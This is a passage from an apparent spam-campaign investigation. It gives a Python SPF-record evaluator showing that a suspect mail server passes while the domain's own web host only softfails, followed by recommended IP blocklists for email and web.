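SPF_RECORD = ("v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 "
              "ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all")

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record: str) -> List[Tuple[str, str, Optional[ipaddress.IPv4Network]]]:
    """Return (qualifier, mechanism, network) triples in record order.
    Raises ValueError for mechanisms this evaluator does not support."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    parsed = []
    for term in terms[1:]:
        qual = "+"                       # RFC 7208: missing qualifier means "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        if term.lower() == "all":
            parsed.append((qual, "all", None))
        elif term.lower().startswith("ip4:"):
            # A bare address (no prefix) is a /32; strict=False tolerates host bits.
            parsed.append((qual, "ip4", ipaddress.ip_network(term[4:], strict=False)))
        else:
            # include:/a/mx/redirect= need DNS; out of scope for an offline example.
            raise ValueError(f"unsupported term: {term}")
    return parsed


def spf_result(record: str, sender_ip: str) -> str:
    """RFC 7208 result for a sending IP: the first matching mechanism wins;
    'neutral' if nothing matches and there is no 'all'."""
    ip = ipaddress.ip_address(sender_ip)
    for qual, mech, net in parse_spf(record):
        if mech == "all" or (net is not None and ip in net):
            return QUALIFIERS[qual]
    return "neutral"


def authorised_span(record: str) -> Tuple[str, str, int]:
    """Lowest and highest address the ip4 mechanisms authorise, and how many
    addresses that is; handy for matching against a run of mx* hostnames."""
    addrs = sorted({a for _, mech, net in parse_spf(record) if mech == "ip4"
                    for a in net})
    return str(addrs[0]), str(addrs[-1]), len(addrs)


if __name__ == "__main__":
    lo, hi, n = authorised_span(SPF_RECORD)
    print(f"SPF authorises {n} addresses, {lo} .. {hi}")
    # The server that sent the spam (mx119.argozelo.info) passes...
    print("188.214.88.119 ->", spf_result(SPF_RECORD, "188.214.88.119"))
    # ...while the domain's own web host (its A record) only softfails. An SPF record
    # that does not cover the address the domain itself lives on, but does cover a
    # block in another country, is a cheap anomaly to look for.
    print("143.95.232.95  ->", spf_result(SPF_RECORD, "143.95.232.95"))
```

An SPF "pass" here proves only that whoever controls the zone wrote those ip4 ranges, which is exactly what a hijacker does; it says nothing about whether the domain owner intended it.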

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204